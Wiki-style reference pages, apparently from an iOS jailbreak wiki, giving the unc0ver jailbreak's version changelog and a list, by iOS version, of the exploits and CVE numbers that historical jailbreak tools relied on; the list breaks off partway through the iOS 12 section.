* Fix another bug in RootFS Restore
* Improve memory management
* Use less external binaries
* Completely clean Cydia's user data in RootFS Restore
|-
| v2.1.3
| rowspan="2" | {{date|2019|01|26}}
|
* Fix a bug in patch finder that affected the shenanigans finder on specific iOS versions
* Switch to a better versioning system
* Make downgrading from v2.2.0 possible (Unreleased as of now)
|-
| v2.1.4
|
*Decrease the app's size from 63MBs to 22MBs by optimizing assets
|-
| v2.2.0
| rowspan="3" | {{date|2019|01|30}}
|
* Install Cydia Substrate if it's not already installed
* Validate Cydia Substrate files and reinstall it if the validation fails
* Fix a bug in switching from Electra without RootFS Restore
* Clean up the kernel data structure patches to improve the performance and the security
* Remove Substitute support files in the filesystem
* Remove Substitute support links in the filesystem
* Uninstall Electra's Cydia Upgrade Helper if it is present
* Improve preference management
* Switch to a more efficient versioning system
* Use a new implementation of the system's libarchive to extract the bootstrap to increase the perfomance
* Update rsync to increase the performance and the stability of RootFS Restore
* Improve memory management
* Re-Extract bootstrap if it was extracted on a different iOS version
* Credit Saurik in the credits view for Cydia and Substrate
* Avoid writing to the disk when not necessary
* Add a verbose log window for the jailbreak
* Make the exploits slightly faster
* Make the jailbreak significantly faster and more performant
* Jailbreak itself now takes almost less than a second run (Exploit not included)
* Fix a bug in patch finder that would cause the sandbox escape to fail on certain devices
* Fix theoretical bugs
* Improve assertion
* Performance improvements
* Fix a bug in logging
* Update bootstrap
* Enable overwriting files in the bootstrap extractor
* Fix switching from Electra without restoring root filesystem
* Fix certain error descriptions
* Fix RootFS Restore on certain devices
* Add a switch to hide the log window
* Decrease the app's size from 81MBs to 25MBs by optimizing assets
* Add a switch to reset Cydia cache on request
* Rewrite Cydia installation
* Install a local repo
* Remove bootstrap
* Hide the local APT repo from Cydia
|-
| v2.2.1
|
* Fix a bug in installing Cydia / extracting bootstrap
|-
| v2.2.2
|
* Fully fix a bug in installing Cydia / extracting bootstrap
|-
| v2.2.3
| {{date|2019|01|31}}
|
* Fix a bug with extracting rsync
|-
| v3.0.0
| {{date|2019|04|19}}
|
* Add support for iOS 12.0-12.1.2.
|-
| v3.0.1
| {{date|2019|04|23}}
|
* Iterate the proc list with proper data locks in Unrestrict to fix a possible race condition in the kernel (Important stability fix)
* Fix a typo in the app
* Fix a bug in logging
* Add iOS 12.1.3 - 12.2 support for the restart button
|-
| v3.1
| {{date|2019|05|23}}
|
* Rewrite the kernel patches from scratch to improve the stability and the reliability of the jailbreak
* Rewrite the preference management system from scratch to optimize the jailbreak
* Rewrite the diagnostics system from scratch to provide more useful information
* Rewrite unrestrict libary from scratch to improve the stability of the system after jailbreak
* Add support for switching from the other iOS 12 jailbreaks without restoring the root filesystem and losing data
* Make Unrestrict add sandbox exceptions for mach_lookup and mach_register
* Fix issues with processes looking up Substrate port on iOS 12 to fix stability and performance issues
* Fix support for the broken versions of RocketBootstrap and hid-support tweaks
* Fix the iMessage audio crash
* Fix FaceTime calls disappearing on some devices
* Fix Camera crash on some devices
* Update the local APT repo to include the latest updates from the Elucubratus repository, including the updated uikittools with rewritten uicache and sbreload commands to make refreshing the icon cache and reloading the SpringBoard significantly faster when installing packages from Cydia
* Refresh the icon cache during the root filesystem restore to fix jailbreak apps staying on the home screen after restoring the root filesystem
* Update mobilesubstrate to version 0.9.7033 to disable loader in the securityd daemon to fix a freeze issue on iOS 12
* Significantly improve the reliability of the jailbreak when using the machswap or the machswap2 exploit
* Wait for the user to tap OK on the jailbreak completed alert before respringing the device
* Improve the jailbreak's self-repairability feature
* Add a progress HUD to display the status of the jailbreak process
* Optimize the code
* Improve assertion
* Add error-specific error messages
* Display info about the device on launch
* Clean up logging
* Reconfigure the "Reload System Daemons" and "Enable get-task-allow" preferences
* Make "Enable get-task-allow" a default option
|-
| v3.1.1
| rowspan="2" | {{date|2019|05|24}}
|
* Fix running root filesystem restore when not in the jailbroken state on iOS 11
* Add an option to automatically restart the SpringBoard once the jailbreak is done instead of waiting for the user to tap the OK button (Requested by a Redditor)
|-
| v3.1.2
|
* Fix a bug in the settings user interface on smaller devices
* Add an option to hide the progress HUD (Requested by a Redditor)
|-
| v3.1.3
| {{date|2019|05|28}}
|
* Fix a bug in updating the status
* Fix a logic bug in remounting the root filesystem (Addresses https://www.reddit.com/r/jailbreak/comments/btxqng/help_still_cant_jb_on_ios_1211_using_the_newest/)
* Make machswap and machswap2 not depend on stealing kernel's credentials to fix a possible reliability issue
* Update kernel patches to use a safer allocation method
* Fix missing information in the jailbreak completed notice
* Fix false information in the jailbreak completed notice
|-
| v3.2
| {{date|2019|06|01}}
|
* Redesign the user interface (https://twitter.com/HiMyNameIsUbik/status/1134938278489182208)
* Add dark mode for the user interface
* Add info buttons for the options
* Increase the reliability of the jailbreak with the machswap and machswap2 exploits
* Update jailbreak-resources to fix an issue with the CS_DEBUGGED option
|-
| v3.2.1
| {{date|2019|06|02}}
|
* Fix several typos in the app
* Update the bundled uikittools
* Ignore refresh icon cache failures unless they are actually fatal
|-
| v3.3.0
| {{date|2019|07|14}}
|
* Add the Sock Puppet exploit for iOS 12.0-12.2 support on A8X-A11 devices
* Remove the empty_list and multi_path exploits
* Replace the kernel exploit segmented switch with picker view
* Add code substitution platform picker view
|-
| v3.3.1
| rowspan="2" | {{date|2019|07|16}}
|
* Improve the speed of the jailbreak process by a few seconds
* Fix a bug in dark mode on the iPads
|-
| v3.3.2
|
* Fix a bug in finding kernel offsets on iOS 11
|-
| v3.3.3
| {{date|2019|07|18}}
|
* Fix the Sock Puppet kernel exploit on iOS 11
* Fix the Voucher Swap exploit's compatibility status with iPad Air 2 and iPad Mini 4 on iOS 11
|-
| v3.3.4
| rowspan="4" | {{date|2019|07|19}}
|
* Add the Sock Port exploit by [https://twitter.com/jakeashacks @jakeashacks] for iOS 11.0-12.1.4 on A7-A9X devices
|-
| v3.3.5
|
* Fix a reliability bug in Sock Port
* Fix Sock Puppet on A8X
|-
| v3.3.6
|
* Fix Sock Port failing on 4K devices
|-
| v3.3.7
|
* Improve the reliability of the Sock Port kernel exploit on 4K devices
|-
| v3.3.8
| {{date|2019|07|22}}
|
* Use the rewritten SockPort 2.0 exploit with ~100% reliability, ~100 milliseconds run time and support for all devices on iOS 11.0-12.2 (12.1.3-12.2 on A12-A12X excluded)
* Fix the jailbreak on iOS 12.2 iPhones and iPods
|-
| v3.4.0
| {{date|2019|07|23}}
|
* Replace the SockPort 2.0 exploit with the SockPuppet 2.0 exploit with better reliability and stability on older devices
|-
| v3.4.1
| rowspan="2" | {{date|2019|07|25}}
|
* Fix the sandbox swap error when using the exploits that are not SockPuppet
* Add the SockPort 1.5 exploit by [https://github.com/jakeajames @jakeajames] for A7-A9X devices (Reliability: ~95% from extensive testing)
* Disable the SockPuppet exploit on A7-A7X due to reliability issues
* Add iOS 12.3~b1 support to the jailbreak (Verified working on iPhone 5s)
* Fix a theoretical reliability bug with SockPuppet
|-
| v3.4.2
|
* Fix the SockPuppet kernel exploit not displaying on A8-A8X devices
|-
| v3.5.0
| {{date|2019|08|18}}
|
* Add iOS 12.4 support to the Sock Puppet (A8-A11) and Sock Port (A7-A7X) exploits
|-
| v3.5.1
| rowspan="3" | {{date|2019|08|19}}
|
* Add the updated SockPuppet 3.0 exploit by @umanghere
* Remove the SockPort and SockPort2 exploits
* Update system-memory-reset fix to fix random reboots
* Add Apple to the credits section for development
* Fix error at stage 2 when jailbreaking after updating from a lower firmware while preserving the app data
* Fix the app crashing up on stared up on iOS 11
|-
| v3.5.2
|
* Fix the SockPuppet 3.0 exploit on iPad Mini 4 and iPad Air 2
|-
| v3.5.3
|
* Add WIP partial support for A12-A12X devices on iOS 12.1.3, 12.1.4, 12.2 and 12.4 with support for setting HSP#4 as TFP0, setting kernel_task info, exporting kernel_task port, dumping APTicket, logging KASLR shift and ECID and disabling auto updates
|-
| v3.5.4
| rowspan="2" | {{date|2019|08|22}}
|
* Add full-fledged SSH support with root-shell for A12-A12X devices on iOS 12.1.3-12.4
* Add support for arbitrary unsigned code execution on A12-A12 devices on iOS 12.1.3-12.4
(Note: Object files will have to be signed with a CMS blob using the codesign utility)
* Add support for running expired or revoked apps on A12-A12X devices on iOS 12.1.3-12.4
* Fix instant or random reboots after jailbreaking with the SockPuppet3.0 exploit on A7-A12X devices on iOS 11.0-12.4
Note: Code injection is not supported on A12-A12X devices as of yet
|-
| v3.5.5
|
* Fixes issues with the jailbreak introduced with the last update
* Fixes iOS 11 support
|-
| v3.5.6
| {{date|2019|08|24}}
|
* Add support for remounting the RootFS as read-write on A12-A12X devices running iOS 12.1.3-12.4
* Adds support for restoring the RootFS on A12-A12X devices running iOS 12.1.3-12.4
|-
| v3.6.0
| rowspan="2" | {{date|2019|09|08}}
|
* Completely redesign and rewrite all jailbreak patches from scratch.
* Make the jailbreak patches static and not dynamic, Meaning that the system stability will be completely stock after the jailbreak.
* Fix the app crashing on launch when signed with provisioning profiles with non-ASCII characters.
* Internally prepare jailbreak patches for full-fledged A12-A12X support.
* Make the jailbreak significantly and noticeably more reliable and faster to run.
* Add the SockPort 3.0 exploit for improved reliability on iOS 12.4 and devices with low RAM.
* Fix SSH support for arm64e devices running iOS 12.0-12.1.2.
* Make it possible to jailbreak with corrupted SystemVersion.plist on iOS 12.4.
* Make the jailbreak perform proper clean up to preserve system stability in case of a failure.
* Fix the jbctl command-line utility.
* Switch to a new technique for setting the system boot nonce generator that works on all arm64e devices running iOS12.0-12.4, (Thanks to [https://github.com/0x7ff @0x7ff] for the idea).
* Fix a bug with the initial Cydia installation getting stuck sometimes.
* Significantly speed up the initial Cydia installation process.
* Internally prepare upcoming stable substitute support.
* Internally prepare Cydia and its resources for full-fledged arm64e support.
|-
| v3.6.1
|
* Improves auto-exploit selection.
|-
| v3.6.2
| rowspan="2" | {{date|2019|09|09}}
|
* Fix an issue with the kernel virtual memory access APIs on A7-A8 devices that rendered the jailbreak useless by causing it to fail to copy big kernel data (Error known as: "Unable to copy container profile in kernel memory.")
|-
| v3.6.3
|
* Fix an issue with finding kernel offsets on A8
|-
| v3.7.0~b2
| rowspan="2" | {{date|2019|10|14}}
|
* Full-fledged A12-A12X support with Cydia and system-wide tweak injection
* Fix Camera on A12-A12X devices
* Fix GPS on A12-A12X devices
* Fix App Store purchases on A12-A12X devices
* Fix Face ID on A12-A12X devices
* Fix performance issues on A12-A12X devices
* Fix stability issues on A12-A12X devices
* Fix reload system daemons issues on A12-A12X devices
* Fix general stability issues with system services on A12-A12X devices
* Fix system shutdown on A12-A12X devices
* Fix system restart on A12-A12X devices
* Fix USB on A12-A12X devices
* Fix Xcode debugging on A12-A12X devices
* Fix a bug in libsubstitute that broke the TetherMe tweak A12-A12X devices
* Enable full-fledged AMFI/CoreTrust bypass on A12-A12X devices
* Fix memory management issues on A12-A12X devices
* Fix tweak injection to MobileSafari on A12-A12X devices
* Make reload system daemons reload services with launchctl instead of ldrestart
* Reload system daemons before restarting SpringBoard
|-
| v3.7.0~b3
|
* Correct a problem with reload system daemons when using Substrate (non-A12 devices)
|-
| v3.7.0~b4
| {{date|2019|12|02}}
|
* Update bundled Cydia to prompt for network access on China devices
* Rename the bundled mobilesubstrate to match other jailbreaks
* Update the bundled substitute to 0.1.0
|-
| v3.8.0~b1
| {{date|2019|12|09}}
|
* Add iOS 12.4.1 support for A12 iPhones (iPads not supported at this time)
|-
| v4.0.0
| {{date|2020|02|15}}
|
* Full-fledged support for A12-A13 devices on iOS 13.0-13.3 with Cydia and system-wide tweak injection
|-
| v4.0.1
| {{date|2020|02|16}}
|
* Fix App Store for A12-A13
* Fix push notifications for A12-A13
* Improve reliability for A12-A13 devices on iOS 13.0-13.3
|-
| v4.0.2
| {{date|2020|02|17}}
|
* Fix iOS 13.0-13.2.3 support
* Fix injection into WebContent
|-
| v4.0.3
| {{date|2020|02|19}}
|
* Fully fix App Store on A12-A13
* Fix a newly introduced bug that affected system services on A12-A13
* Improve the exploit reliability by guiding the user on proper use on A12-A13
|-
| v4.1.0
| {{date|2020|02|23}}
|
* Replace the oob_timestamp exploit by [https://twitter.com/bazad @bazad] with the time_waste exploit by [https://twitter.com/jakeashacks @jakeashacks] for 99% stage 1 (exploit) reliability on iOS 13.0-13.3
* Fix compatibility issues with iOS 11.0-12.4 and 13.0-13.2.3
|-
| v4.2.0
| {{date|2020|02|25}}
|
* Fix issues with system services on A12-A13 (i.e. iMessage notifications)
* Add iOS 13.0-13.3 support for A8-A11 devices
* Fix temporary freeze after the jailbreak completed alert
|-
| v4.2.1
| {{date|2020|02|26}}
|
* Fix a bug that caused unreliability in starting up substitute
* Fix an issue that broke battery settings and caused extra battery drain
|-
| v4.3.1
| {{date|2020|03|08}}
|
* Bumped version to 4.3.1 due to a github bug causing an older file to be temporarily available
* Add support for rebooting the userspace for the first time in a jailbreak
* Add support for injecting to the entire userspace
* Add support for looking up or registering services from the sandbox with the cy: prefix for developers
* Reboot the userspace after jailbreaking
* Make major design changes to preserve stock system performance
* Fix random reboots, freezes, memory issues and any known problem that affected system services or apps
* Fix persistent software update blocker on iOS 13 (Works in the jailed state too)
* Fix a design problem that affected the Succession restore tool
* Automatically re-enable software updates when restoring RootFS
|-
| v5.0.0
| {{date|2020|05|23}}
|
* Full-fledged support for all devices on iOS 11.0-13.5 with Cydia and tweak injection
|-
| v5.0.1
| {{date|2020|05|24}}
|
* Full-fledged support for all devices on iOS 11.0-13.5 with Cydia and tweak injection
* Enable unrestricted storage access to jailbreak applications for sandbox backwards compatibility while keeping security intact by leaving the security restrictions enabled for system and user applications
* Update Phone Rebel case models and bundled packages
|-
| v5.2.0
| {{date|2020|06|09}}
|
* Enable iOS 13.5.5~b1 support
* Fix a logic bug in disabling auto updates
* Update bundled Cydia to fix crashes on iOS 13.5 with Hardware Keyboard enabled
|}

[[Category:Jailbreaks]]
[[Category:Jailbreaking]]

Jailbreak Exploits

2020-06-01T23:51:24Z

Inflatable Man: /* Unc0ver (13.0 - 13.5) */

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

